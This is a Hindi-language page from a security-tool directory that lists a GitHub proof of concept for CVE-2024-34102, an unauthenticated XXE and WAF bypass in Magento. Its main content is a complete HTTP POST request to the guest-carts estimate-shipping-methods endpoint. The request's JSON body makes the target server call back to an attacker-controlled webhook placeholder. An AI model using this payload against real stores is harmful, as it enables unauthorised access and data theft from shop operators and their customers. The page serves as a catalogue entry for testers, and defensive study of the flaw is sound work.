Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-34102 — CVE-2024-34102 के लिए प्रूफ-ऑफ-कॉन्सेप्ट, estimate-shipping-methods एंडपॉइंट पर एक क्राफ्टेड अनुरोध भेजकर और हमलावर के वेबहुक पर HTTP कॉलबैक लौटाकर अप्रमाणित Magento XXE और WAF बाईपास का शोषण करता है। | Kitploit
उपकरण/GitHubGitHub/11whoami99/cve-2024-34102
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणWAF बाईपासपेनिट्रेशन टेस्टिंग
GitHub11whoami99/cve-2024-34102

CVE-2024-34102

CVE-2024-34102 के लिए प्रूफ-ऑफ-कॉन्सेप्ट, estimate-shipping-methods एंडपॉइंट पर एक क्राफ्टेड अनुरोध भेजकर और हमलावर के वेबहुक पर HTTP कॉलबैक लौटाकर अप्रमाणित Magento XXE और WAF बाईपास का शोषण करता है।

रिपॉजिटरी देखें
322 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2024-34102

CVE-2024-34102 के लिए POC : अप्रमाणित Magento XXE और WAF को बायपास करना, आपको अपने webhook पर http कनेक्शन मिलेगा

root@kitploit:~
POST /rest/V1/guest-carts/1/estimate-shipping-methods HTTP/2
Host: example.com
Accept:  application/json, text/javascript, */*; q=0.01
Content-Length: 310
Content-Type: application/json
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36

{
  "address": {
    "totalsCollector": {
      "collectorList": {
        "totalCollector": {
          "sourceData": {
            "data": "http://YOUR-webhook",
            "dataIsURL": true,
            "options": 1337
          }
        }
      }
    }
  }
}
टूल डाउनलोड करें